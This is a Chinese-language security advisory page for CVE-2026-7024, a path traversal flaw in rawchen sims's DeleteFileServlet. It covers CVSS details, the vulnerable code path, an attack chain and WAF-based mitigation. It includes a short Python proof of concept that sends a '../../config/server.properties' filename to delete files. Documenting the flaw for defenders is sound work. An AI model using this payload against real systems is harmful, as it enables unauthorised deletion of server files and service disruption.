IPBUF安全漏洞报告
English
CVE-2026-7024 CVSS 5.4 中危

CVE-2026-7024 rawchen sims路径遍历漏洞

披露日期: 2026-04-26

漏洞信息

漏洞编号
CVE-2026-7024
漏洞类型
路径遍历
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
rawchen sims

相关标签

Path TraversalCWE-22rawchen simsFile DeletionRemote

漏洞概述

rawchen sims组件中的DeleteFileServlet端点存在路径遍历安全漏洞。该漏洞源于sims-master/src/web/servlet/file/DeleteFileServlet.java文件对filename参数的处理不当。攻击者无需用户交互,仅需低权限即可远程发起攻击,通过操纵filename参数遍历系统路径。此漏洞可能导致敏感文件被删除,对系统的完整性和可用性造成威胁。目前厂商尚未发布修复补丁。

技术细节

该漏洞位于rawchen sims项目的文件删除接口中。具体代码在sims-master/src/web/servlet/file/DeleteFileServlet.java,其核心问题在于未对传入的“filename”参数进行严格的路径合法性校验。在典型的文件删除操作中,应当限制文件路径在特定的上传目录内。然而,受影响的代码直接使用了用户传入的filename参数进行文件操作,未过滤如“../”等目录跳转字符。攻击者可以构造包含“../”序列的恶意请求,例如“filename=../../config.properties”。由于CVSS向量为C:N/I:L/A:L,主要风险在于删除文件(完整性/可用性)。攻击者通过发送特制的HTTP请求,利用低权限账户即可跨越预设目录,删除服务器上的任意文件。若删除关键配置文件或可执行文件,可导致服务中断。

攻击链分析

STEP 1
侦察
攻击者识别目标系统上运行的rawchen sims应用,并定位到DeleteFileServlet接口。
STEP 2
权限获取
利用低权限账户(PR:L)访问系统,无需用户交互。
STEP 3
漏洞利用
构造包含路径遍历字符(如../)的恶意HTTP请求,修改filename参数指向系统关键文件。
STEP 4
执行攻击
发送恶意请求,服务器后端未校验直接执行删除操作,导致目标文件被移除。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit(target_url): # Exploit PoC for CVE-2026-7024 # The vulnerability allows path traversal in the 'filename' parameter # of the DeleteFileServlet endpoint. payload = { # Attempt to delete a configuration file using traversal sequences "filename": "../../config/server.properties" } try: print(f"[+] Sending exploit request to {target_url}...") response = requests.post(target_url, data=payload, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check server for file deletion.") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with actual target endpoint target = "http://localhost:8080/sims/deleteFile" exploit(target)

影响范围

rawchen sims (commit <= 004f783b1db5ecdfad81c8fdc3b34171211112de)

防御指南

临时缓解措施
建议在WAF或应用网关层面添加规则,拦截包含“../”或“..\”字符的文件删除请求。同时,严格限制Web服务进程的文件系统写入权限,禁止其访问非业务目录。若临时无法修复,建议在公网下关闭相关文件管理接口。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表